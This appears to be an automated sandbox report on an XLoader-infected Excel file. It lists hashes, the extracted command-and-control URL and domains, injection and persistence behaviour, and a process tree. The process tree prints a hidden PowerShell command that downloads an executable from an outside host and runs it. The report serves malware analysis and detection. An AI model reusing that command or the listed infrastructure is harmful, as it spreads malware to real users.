Analysis
-
max time kernel
148s -
max time network
145s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
20-04-2021 03:14
Static task
static1
Behavioral task
behavioral1
Sample
W029621.xls
Resource
win7v20210410
Behavioral task
behavioral2
Sample
W029621.xls
Resource
win10v20210410
General
-
Target
W029621.xls
-
Size
342KB
-
MD5
dcb68156748e6c71ef5df8d9dddb3ff6
-
SHA1
ffee33ce2a6b4523a5f7323ca00a7347b1dc986a
-
SHA256
7da573f1004e4bb9c6979a6ccca45da8998deaa92dd1e318d128ff4888212536
-
SHA512
eb24bd095799613417aaf3b0d8344af0cfce01d9700379e5e3ed7b8eff3f0d5abd3606866704a871aa0e2469b84ca24ce2416a590711329695ed0e700276186e
Malware Config
Extracted
xloader
2.3
http://www.preciousvessel.com/spj6/
kdelchev.com
myriamward.com
megaconsulting.pro
sunglassesmu.com
hispanavisionct.com
bodaciousbuffy.com
chuhuu.com
jerexcursion.com
merkabahindustries.com
shaktiroommontreal.com
violet-moon-interior-design.com
pyrosunited.com
89xs.xyz
bestchatonline.com
cubiscoin.com
ianzu.com
playersresearch.com
digitalvl.com
baans-barw.com
yuria-rain.com
littletonautoparts.com
maxstratosband.com
landmarkshoes.com
windhowls.com
boonbang.com
ladylacewig.com
football-highlights.online
ampbetting.com
zuerich-orthopaedics.com
divorcequiz.com
idahooutsiders.com
adindia.online
arsenismiaris.com
cougarjack.net
dtbjx.com
streetfoodaroundtheglobe.com
laosredwood.net
northparkcampground.com
fundacjacd.com
3thaiph.com
devavara.com
artworldmag.com
filans.xyz
kuppers.info
abogusz.art
vesivietnam.com
ourforms.net
qmglg.com
unhackabledream.com
inesatwall.info
my-watch-strap.com
nedafarm.com
myonlinesericing.com
shopjrock.com
altac.pro
hodongfarm.com
alienmisttree.net
miamipopcello.com
normiecat.com
beautybar.sucks
myandroidhead.com
edevlet-giris-hizmetler.com
mamamiafoodies.com
pandagsm.com
Signatures
-
Xloader Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/820-103-0x0000000000400000-0x0000000000428000-memory.dmp xloader behavioral1/memory/820-104-0x000000000041D010-mapping.dmp xloader behavioral1/memory/1768-114-0x0000000000080000-0x00000000000A8000-memory.dmp xloader -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 748 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
issuepolitical.exeissuepolitical.exepid process 2032 issuepolitical.exe 820 issuepolitical.exe -
Loads dropped DLL 4 IoCs
Processes:
powershell.exeissuepolitical.exepid process 748 powershell.exe 748 powershell.exe 748 powershell.exe 2032 issuepolitical.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
issuepolitical.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\notepa = "\"C:\\Users\\Admin\\AppData\\Local\\notepa.exe\"" issuepolitical.exe -
Drops file in System32 directory 5 IoCs
Processes:
OUTLOOK.EXEpowershell.exedescription ioc process File created C:\Windows\SysWOW64\PerfStringBackup.TMP OUTLOOK.EXE File opened for modification C:\Windows\SysWOW64\PerfStringBackup.INI OUTLOOK.EXE File created C:\Windows\system32\perfc009.dat OUTLOOK.EXE File created C:\Windows\system32\perfh009.dat OUTLOOK.EXE File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
issuepolitical.exeissuepolitical.exeNETSTAT.EXEdescription pid process target process PID 2032 set thread context of 820 2032 issuepolitical.exe issuepolitical.exe PID 820 set thread context of 1256 820 issuepolitical.exe Explorer.EXE PID 1768 set thread context of 1256 1768 NETSTAT.EXE Explorer.EXE -
Drops file in Windows directory 3 IoCs
Processes:
OUTLOOK.EXEdescription ioc process File created C:\Windows\inf\Outlook\outlperf.h OUTLOOK.EXE File opened for modification C:\Windows\inf\Outlook\outlperf.h OUTLOOK.EXE File created C:\Windows\inf\Outlook\0009\outlperf.ini OUTLOOK.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
NETSTAT.EXEpid process 1768 NETSTAT.EXE -
Processes:
EXCEL.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE -
Modifies registry class 64 IoCs
Processes:
OUTLOOK.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630F3-0000-0000-C000-000000000046}\ProxyStubClsid32 OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063026-0000-0000-C000-000000000046}\ProxyStubClsid32 OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00067366-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672E5-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672F4-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006302B-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063085-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006304C-0000-0000-C000-000000000046}\ = "Exceptions" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C6-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006307D-0000-0000-C000-000000000046} OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672E2-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672E3-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672F8-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063006-0000-0000-C000-000000000046}\ProxyStubClsid32 OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C5-0000-0000-C000-000000000046}\ = "_Account" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E2-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006307B-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063020-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630F3-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063099-0000-0000-C000-000000000046} OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063001-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063041-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D5-0000-0000-C000-000000000046}\ProxyStubClsid32 OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E1-0000-0000-C000-000000000046} OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630B1-0000-0000-C000-000000000046}\ = "_Reminders" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006302F-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630A5-0000-0000-C000-000000000046} OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630A5-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630A2-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630CD-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630B1-0000-0000-C000-000000000046}\ProxyStubClsid32 OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006300E-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672DA-0000-0000-C000-000000000046}\ProxyStubClsid32 OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063048-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006300F-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063097-0000-0000-C000-000000000046} OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630A2-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672F8-0000-0000-C000-000000000046} OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006303D-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630DD-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006309E-0000-0000-C000-000000000046} OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630A1-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630ED-0000-0000-C000-000000000046}\ProxyStubClsid32 OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063005-0000-0000-C000-000000000046}\ = "_Inspector" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E7-0000-0000-C000-000000000046} OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D0-0000-0000-C000-000000000046} OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006300F-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672DF-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D7-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E4-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E5-0000-0000-C000-000000000046} OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630A7-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063079-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630EB-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630FD-0000-0000-C000-000000000046} OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006303E-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063006-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E5-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063102-0000-0000-C000-000000000046}\ProxyStubClsid32 OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630B1-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063023-0000-0000-C000-000000000046}\ = "_RemoteItem" OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063023-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672DD-0000-0000-C000-000000000046}\TypeLib OUTLOOK.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672DF-0000-0000-C000-000000000046}\TypeLib\Version = "9.4" OUTLOOK.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2004 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
powershell.exeissuepolitical.exeissuepolitical.exeNETSTAT.EXEpid process 748 powershell.exe 2032 issuepolitical.exe 2032 issuepolitical.exe 820 issuepolitical.exe 820 issuepolitical.exe 1768 NETSTAT.EXE 1768 NETSTAT.EXE 1768 NETSTAT.EXE 1768 NETSTAT.EXE 1768 NETSTAT.EXE 1768 NETSTAT.EXE 1768 NETSTAT.EXE 1768 NETSTAT.EXE 1768 NETSTAT.EXE 1768 NETSTAT.EXE 1768 NETSTAT.EXE 1768 NETSTAT.EXE 1768 NETSTAT.EXE 1768 NETSTAT.EXE 1768 NETSTAT.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 1256 Explorer.EXE -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
issuepolitical.exeNETSTAT.EXEpid process 820 issuepolitical.exe 820 issuepolitical.exe 820 issuepolitical.exe 1768 NETSTAT.EXE 1768 NETSTAT.EXE -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
powershell.exeOUTLOOK.EXEissuepolitical.exeissuepolitical.exeNETSTAT.EXEExplorer.EXEdescription pid process Token: SeDebugPrivilege 748 powershell.exe Token: SeShutdownPrivilege 1968 OUTLOOK.EXE Token: SeDebugPrivilege 2032 issuepolitical.exe Token: SeDebugPrivilege 820 issuepolitical.exe Token: SeDebugPrivilege 1768 NETSTAT.EXE Token: SeShutdownPrivilege 1256 Explorer.EXE Token: SeShutdownPrivilege 1256 Explorer.EXE Token: SeShutdownPrivilege 1256 Explorer.EXE Token: SeShutdownPrivilege 1256 Explorer.EXE -
Suspicious use of FindShellTrayWindow 8 IoCs
Processes:
OUTLOOK.EXEExplorer.EXEpid process 1968 OUTLOOK.EXE 1968 OUTLOOK.EXE 1968 OUTLOOK.EXE 1968 OUTLOOK.EXE 1968 OUTLOOK.EXE 1968 OUTLOOK.EXE 1256 Explorer.EXE 1256 Explorer.EXE -
Suspicious use of SendNotifyMessage 7 IoCs
Processes:
OUTLOOK.EXEExplorer.EXEpid process 1968 OUTLOOK.EXE 1968 OUTLOOK.EXE 1968 OUTLOOK.EXE 1968 OUTLOOK.EXE 1968 OUTLOOK.EXE 1256 Explorer.EXE 1256 Explorer.EXE -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
EXCEL.EXEOUTLOOK.EXEpid process 2004 EXCEL.EXE 2004 EXCEL.EXE 2004 EXCEL.EXE 1968 OUTLOOK.EXE -
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
OUTLOOK.EXEpowershell.exeissuepolitical.exeExplorer.EXENETSTAT.EXEdescription pid process target process PID 1968 wrote to memory of 748 1968 OUTLOOK.EXE powershell.exe PID 1968 wrote to memory of 748 1968 OUTLOOK.EXE powershell.exe PID 1968 wrote to memory of 748 1968 OUTLOOK.EXE powershell.exe PID 1968 wrote to memory of 748 1968 OUTLOOK.EXE powershell.exe PID 748 wrote to memory of 2032 748 powershell.exe issuepolitical.exe PID 748 wrote to memory of 2032 748 powershell.exe issuepolitical.exe PID 748 wrote to memory of 2032 748 powershell.exe issuepolitical.exe PID 748 wrote to memory of 2032 748 powershell.exe issuepolitical.exe PID 2032 wrote to memory of 820 2032 issuepolitical.exe issuepolitical.exe PID 2032 wrote to memory of 820 2032 issuepolitical.exe issuepolitical.exe PID 2032 wrote to memory of 820 2032 issuepolitical.exe issuepolitical.exe PID 2032 wrote to memory of 820 2032 issuepolitical.exe issuepolitical.exe PID 2032 wrote to memory of 820 2032 issuepolitical.exe issuepolitical.exe PID 2032 wrote to memory of 820 2032 issuepolitical.exe issuepolitical.exe PID 2032 wrote to memory of 820 2032 issuepolitical.exe issuepolitical.exe PID 1256 wrote to memory of 1768 1256 Explorer.EXE NETSTAT.EXE PID 1256 wrote to memory of 1768 1256 Explorer.EXE NETSTAT.EXE PID 1256 wrote to memory of 1768 1256 Explorer.EXE NETSTAT.EXE PID 1256 wrote to memory of 1768 1256 Explorer.EXE NETSTAT.EXE PID 1768 wrote to memory of 572 1768 NETSTAT.EXE cmd.exe PID 1768 wrote to memory of 572 1768 NETSTAT.EXE cmd.exe PID 1768 wrote to memory of 572 1768 NETSTAT.EXE cmd.exe PID 1768 wrote to memory of 572 1768 NETSTAT.EXE cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\W029621.xls2⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\NETSTAT.EXE"C:\Windows\SysWOW64\NETSTAT.EXE"2⤵
- Suspicious use of SetThreadContext
- Gathers network information
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Local\Temp\issuepolitical.exe"3⤵
-
C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE"C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w Hidden Invoke-WebRequest -Uri "http://iklangratissurabaya.skom.id/zx/Fsbey.exe" -OutFile "C:\Users\Public\Documents\issuepolitical.exe";C:\Users\Public\Documents\issuepolitical.exe2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Documents\issuepolitical.exe"C:\Users\Public\Documents\issuepolitical.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\issuepolitical.exeC:\Users\Admin\AppData\Local\Temp\issuepolitical.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\issuepolitical.exeMD5
8ab4c430e65defdd7b9975db28d3c92d
SHA1d509f417d02c31f4ebe3a7b22448af639d62568b
SHA256b9ecf814b7f31a8ee1445d0256ba7a74f46d3e8f0bb588d10c54cd7f7f0fc202
SHA512680cfa533f688406a7e6e918955464305feea64f79e252450ba387e22101ca72c31b4178fa8f30911b198c162342c3d749a48e2abe8bee0181ca747f3168e37b
-
C:\Users\Admin\AppData\Local\Temp\issuepolitical.exeMD5
8ab4c430e65defdd7b9975db28d3c92d
SHA1d509f417d02c31f4ebe3a7b22448af639d62568b
SHA256b9ecf814b7f31a8ee1445d0256ba7a74f46d3e8f0bb588d10c54cd7f7f0fc202
SHA512680cfa533f688406a7e6e918955464305feea64f79e252450ba387e22101ca72c31b4178fa8f30911b198c162342c3d749a48e2abe8bee0181ca747f3168e37b
-
C:\Users\Public\Documents\issuepolitical.exeMD5
8ab4c430e65defdd7b9975db28d3c92d
SHA1d509f417d02c31f4ebe3a7b22448af639d62568b
SHA256b9ecf814b7f31a8ee1445d0256ba7a74f46d3e8f0bb588d10c54cd7f7f0fc202
SHA512680cfa533f688406a7e6e918955464305feea64f79e252450ba387e22101ca72c31b4178fa8f30911b198c162342c3d749a48e2abe8bee0181ca747f3168e37b
-
C:\Users\Public\Documents\issuepolitical.exeMD5
8ab4c430e65defdd7b9975db28d3c92d
SHA1d509f417d02c31f4ebe3a7b22448af639d62568b
SHA256b9ecf814b7f31a8ee1445d0256ba7a74f46d3e8f0bb588d10c54cd7f7f0fc202
SHA512680cfa533f688406a7e6e918955464305feea64f79e252450ba387e22101ca72c31b4178fa8f30911b198c162342c3d749a48e2abe8bee0181ca747f3168e37b
-
\Users\Admin\AppData\Local\Temp\issuepolitical.exeMD5
8ab4c430e65defdd7b9975db28d3c92d
SHA1d509f417d02c31f4ebe3a7b22448af639d62568b
SHA256b9ecf814b7f31a8ee1445d0256ba7a74f46d3e8f0bb588d10c54cd7f7f0fc202
SHA512680cfa533f688406a7e6e918955464305feea64f79e252450ba387e22101ca72c31b4178fa8f30911b198c162342c3d749a48e2abe8bee0181ca747f3168e37b
-
\Users\Public\Documents\issuepolitical.exeMD5
8ab4c430e65defdd7b9975db28d3c92d
SHA1d509f417d02c31f4ebe3a7b22448af639d62568b
SHA256b9ecf814b7f31a8ee1445d0256ba7a74f46d3e8f0bb588d10c54cd7f7f0fc202
SHA512680cfa533f688406a7e6e918955464305feea64f79e252450ba387e22101ca72c31b4178fa8f30911b198c162342c3d749a48e2abe8bee0181ca747f3168e37b
-
\Users\Public\Documents\issuepolitical.exeMD5
8ab4c430e65defdd7b9975db28d3c92d
SHA1d509f417d02c31f4ebe3a7b22448af639d62568b
SHA256b9ecf814b7f31a8ee1445d0256ba7a74f46d3e8f0bb588d10c54cd7f7f0fc202
SHA512680cfa533f688406a7e6e918955464305feea64f79e252450ba387e22101ca72c31b4178fa8f30911b198c162342c3d749a48e2abe8bee0181ca747f3168e37b
-
\Users\Public\Documents\issuepolitical.exeMD5
8ab4c430e65defdd7b9975db28d3c92d
SHA1d509f417d02c31f4ebe3a7b22448af639d62568b
SHA256b9ecf814b7f31a8ee1445d0256ba7a74f46d3e8f0bb588d10c54cd7f7f0fc202
SHA512680cfa533f688406a7e6e918955464305feea64f79e252450ba387e22101ca72c31b4178fa8f30911b198c162342c3d749a48e2abe8bee0181ca747f3168e37b
-
memory/572-112-0x0000000000000000-mapping.dmp
-
memory/748-75-0x0000000005730000-0x0000000005731000-memory.dmpFilesize
4KB
-
memory/748-68-0x00000000048E0000-0x00000000048E1000-memory.dmpFilesize
4KB
-
memory/748-65-0x0000000000000000-mapping.dmp
-
memory/748-80-0x0000000006140000-0x0000000006141000-memory.dmpFilesize
4KB
-
memory/748-81-0x00000000062E0000-0x00000000062E1000-memory.dmpFilesize
4KB
-
memory/748-88-0x00000000063E0000-0x00000000063E1000-memory.dmpFilesize
4KB
-
memory/748-89-0x00000000064E0000-0x00000000064E1000-memory.dmpFilesize
4KB
-
memory/748-90-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB
-
memory/748-70-0x0000000002580000-0x00000000031CA000-memory.dmpFilesize
12.3MB
-
memory/748-71-0x0000000002640000-0x0000000002641000-memory.dmpFilesize
4KB
-
memory/748-69-0x0000000002580000-0x00000000031CA000-memory.dmpFilesize
12.3MB
-
memory/748-66-0x00000000765F1000-0x00000000765F3000-memory.dmpFilesize
8KB
-
memory/748-72-0x0000000002850000-0x0000000002851000-memory.dmpFilesize
4KB
-
memory/748-67-0x0000000000A90000-0x0000000000A91000-memory.dmpFilesize
4KB
-
memory/820-107-0x0000000000AD0000-0x0000000000DD3000-memory.dmpFilesize
3.0MB
-
memory/820-108-0x0000000000260000-0x0000000000270000-memory.dmpFilesize
64KB
-
memory/820-103-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/820-104-0x000000000041D010-mapping.dmp
-
memory/1256-118-0x00000000051A0000-0x000000000527C000-memory.dmpFilesize
880KB
-
memory/1256-119-0x000007FEF63C0000-0x000007FEF6503000-memory.dmpFilesize
1.3MB
-
memory/1256-109-0x00000000065F0000-0x0000000006757000-memory.dmpFilesize
1.4MB
-
memory/1256-120-0x000007FE95DA0000-0x000007FE95DAA000-memory.dmpFilesize
40KB
-
memory/1768-110-0x0000000000000000-mapping.dmp
-
memory/1768-114-0x0000000000080000-0x00000000000A8000-memory.dmpFilesize
160KB
-
memory/1768-116-0x0000000000500000-0x000000000058F000-memory.dmpFilesize
572KB
-
memory/1768-113-0x00000000003A0000-0x00000000003A9000-memory.dmpFilesize
36KB
-
memory/1768-115-0x0000000002220000-0x0000000002523000-memory.dmpFilesize
3.0MB
-
memory/2004-62-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
